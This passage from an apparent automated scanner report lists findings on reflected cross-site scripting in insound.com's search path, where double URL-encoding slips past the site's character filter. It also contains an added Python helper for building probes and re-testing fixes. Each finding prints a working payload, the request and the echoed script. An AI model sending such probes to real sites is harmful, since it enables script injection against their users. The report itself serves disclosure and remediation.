Date: Fri, 10 Dec 2010 02:39:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3hidkj0fmhjokevrot771e53q2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=451964201; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=433461517; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candlebox b7dab</title><script>alert(1)</script>41e17648200</title>
...[SNIP]...

1.48. http://www.insound.com/search/query/Candlebox%20&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candlebox%20&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2433b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc8ce133cab was submitted in the REST URL parameter 3. This input was echoed as 2433b"><script>alert(1)</script>bc8ce133cab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candlebox%202433b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc8ce133cab&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5kooidaq81edal98j9e9vovce4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=229923999; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=519800143; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candlebox 2433b"><script>alert(1)</script>bc8ce133cab" />
...[SNIP]...

1.49. http://www.insound.com/search/query/Candlemass&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candlemass&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 305c7%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e14956eb823c was submitted in the REST URL parameter 3. This input was echoed as 305c7</title><script>alert(1)</script>14956eb823c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candlemass305c7%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e14956eb823c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=kkedspan8dfvglcovsd4afd805; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=527840965; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=471215466; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candlemass305c7</title><script>alert(1)</script>14956eb823c</title>
...[SNIP]...

1.50. http://www.insound.com/search/query/Candlemass&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candlemass&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b265494035 was submitted in the REST URL parameter 3. This input was echoed as 41c7e"><script>alert(1)</script>2b265494035 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candlemass41c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b265494035&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5pcsvfiicild36p51amor3tq16; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=241737989; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=266945355; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candlemass41c7e"><script>alert(1)</script>2b265494035" />
...[SNIP]...

1.51. http://www.insound.com/search/query/Candy%20Bars&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Bars&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0276d94bb6 was submitted in the REST URL parameter 3. This input was echoed as deb13"><script>alert(1)</script>a0276d94bb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candy%20Barsdeb13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0276d94bb6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0b71lc4ke7rkv8f05vodsdv535; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=428406454; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=203325106; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candy Barsdeb13"><script>alert(1)</script>a0276d94bb6" />
...[SNIP]...

1.52. http://www.insound.com/search/query/Candy%20Bars&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Bars&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 54e69%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e993e8d654d2 was submitted in the REST URL parameter 3. This input was echoed as 54e69</title><script>alert(1)</script>993e8d654d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candy%20Bars54e69%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e993e8d654d2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=q8cosbl17gd7kurimhcj45cfk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=474164681; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=355844345; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candy Bars54e69</title><script>alert(1)</script>993e8d654d2</title>
...[SNIP]...
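Every finding in this section has the same shape: a double-encoded probe bracketed by two random canaries, and a response in which the once-more-decoded payload appears either between TITLE tags or inside a double-quoted attribute. The following Python check is added here and is not part of the scanner report; it rebuilds such a probe and classifies what a response body contains, which is the re-test a practitioner wants after a fix has been deployed. The response fragments are constructed from the snippets in findings 1.46 and 1.47 plus a hypothetical fixed variant; `fetch` is a plain urllib helper for a live run and is not exercised offline.

```python
"""
Added example, not part of the scanner report: rebuild the double-encoded
probe the findings describe and decide, from a response body, whether the
payload came back unencoded. Runs offline against constructed response
fragments; `fetch` is the only networked helper and is not called here.
"""
import html
import secrets
import urllib.parse
import urllib.request

# Break-outs for the two contexts the report identifies.
ATTRIBUTE_BREAKOUT = '"><script>alert(1)</script>'    # inside value="..."
TITLE_BREAKOUT = '</title><script>alert(1)</script>'  # inside <title>


def double_encode(s: str) -> str:
    """Percent-encode twice, as the scanner did: '<' -> '%3C' -> '%253C'."""
    return urllib.parse.quote(urllib.parse.quote(s, safe=""), safe="")


def build_probe(prefix: str, breakout: str, start: str = "", end: str = ""):
    """Return (path_segment, payload). `start` and `end` are random canaries
    that bracket the break-out so an unrelated <script> on the page is not
    mistaken for the injected one; pass fixed values for reproducibility."""
    start = start or secrets.token_hex(3)
    end = end or secrets.token_hex(6)
    payload = f"{start}{breakout}{end}"
    return prefix + double_encode(payload), payload


def classify_reflection(body: str, payload: str) -> str:
    """
    'unencoded'    payload appears verbatim: the finding is confirmed
    'encoded'      only the HTML-entity form appears: output encoding in place
    'once-decoded' only the %XX form appears: the second decode is gone
    'absent'       no trace of the payload in the body
    """
    if payload in body:
        return "unencoded"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    if urllib.parse.quote(payload, safe="").lower() in body.lower():
        return "once-decoded"
    return "absent"


def fetch(url: str) -> str:
    """Live re-test helper (not run offline). urlopen follows the redirect
    the report mentions, as a browser would, before returning the body."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, errors="replace")


# Constructed response fragments: the first two are copied from the
# responses in findings 1.46 and 1.47, the third is a hypothetical fixed page.
VULN_ATTR_BODY = ('<input type="hidden" name="query" '
                  'value="Candie Hank96840"><script>alert(1)</script>c0727089e40" />')
VULN_TITLE_BODY = ("<title>Candlebox b7dab</title><script>alert(1)</script>"
                   "41e17648200</title>")
FIXED_ATTR_BODY = ('<input type="hidden" name="query" '
                   'value="Candie Hank96840&quot;&gt;&lt;script&gt;alert(1)'
                   '&lt;/script&gt;c0727089e40" />')
ONCE_DECODED_BODY = ('<input type="hidden" name="query" '
                     'value="Candie Hank96840%22%3e%3cscript%3ealert%281%29'
                     '%3c%2fscript%3ec0727089e40" />')

if __name__ == "__main__":
    path, payload = build_probe("Candie%20Hank", ATTRIBUTE_BREAKOUT,
                                "96840", "c0727089e40")
    print("GET /search/query/" + path + "&from=47597/ HTTP/1.1")
    for name, body in [("vulnerable", VULN_ATTR_BODY), ("fixed", FIXED_ATTR_BODY),
                       ("once-decoded", ONCE_DECODED_BODY)]:
        print(name, "->", classify_reflection(body, payload))
```

With the canaries fixed to the ones the scanner used, `build_probe` reproduces the path segment from the request in 1.46 (hex case aside). Classifying the live body as `encoded` or `once-decoded` is the evidence that one of the two defects named in the remediation detail has been removed; only `unencoded` reproduces the finding.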

1.53. http://www.insound.com/search/query/Candy%20Claws&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Claws&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6246%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eeb5d00fd0e3 was submitted in the REST URL parameter 3. This input was echoed as d6246"><script>alert(1)</script>eb5d00fd0e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candy%20Clawsd6246%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eeb5d00fd0e3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=07i2k805k6q459tkbkpihsb3o3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=280059512; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=83596684; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candy Clawsd6246"><script>alert(1)</script>eb5d00fd0e3" />
...[SNIP]...

1.54. http://www.insound.com/search/query/Candy%20Claws&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Claws&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 40b9b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7a240c2ee7f was submitted in the REST URL parameter 3. This input was echoed as 40b9b</title><script>alert(1)</script>7a240c2ee7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candy%20Claws40b9b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7a240c2ee7f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2m3m6iv3gr69j53mr1o0tumk72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=469748567; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=298062000; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candy Claws40b9b</title><script>alert(1)</script>7a240c2ee7f</title>
...[SNIP]...

1.55. http://www.insound.com/search/query/Candy%20Snatchers&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Snatchers&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 2ca8b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30d17cf6bd8 was submitted in the REST URL parameter 3. This input was echoed as 2ca8b</title><script>alert(1)</script>30d17cf6bd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candy%20Snatchers2ca8b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30d17cf6bd8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=a2v0llh44cdem12nhhf94gvk43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=221056369; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=105961041; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candy Snatchers2ca8b</title><script>alert(1)</script>30d17cf6bd8</title>
...[SNIP]...

1.56. http://www.insound.com/search/query/Candy%20Snatchers&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Snatchers&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3adb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8968e5029bc was submitted in the REST URL parameter 3. This input was echoed as 3adb7"><script>alert(1)</script>8968e5029bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candy%20Snatchers3adb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8968e5029bc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=97a1begkmeb910qtnjjn7d5o73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=556728426; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=65384639; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candy Snatchers3adb7"><script>alert(1)</script>8968e5029bc" />
...[SNIP]...

1.57. http://www.insound.com/search/query/Candyskins&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candyskins&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 529f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ac8e9c7a2d was submitted in the REST URL parameter 3. This input was echoed as 529f5"><script>alert(1)</script>9ac8e9c7a2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

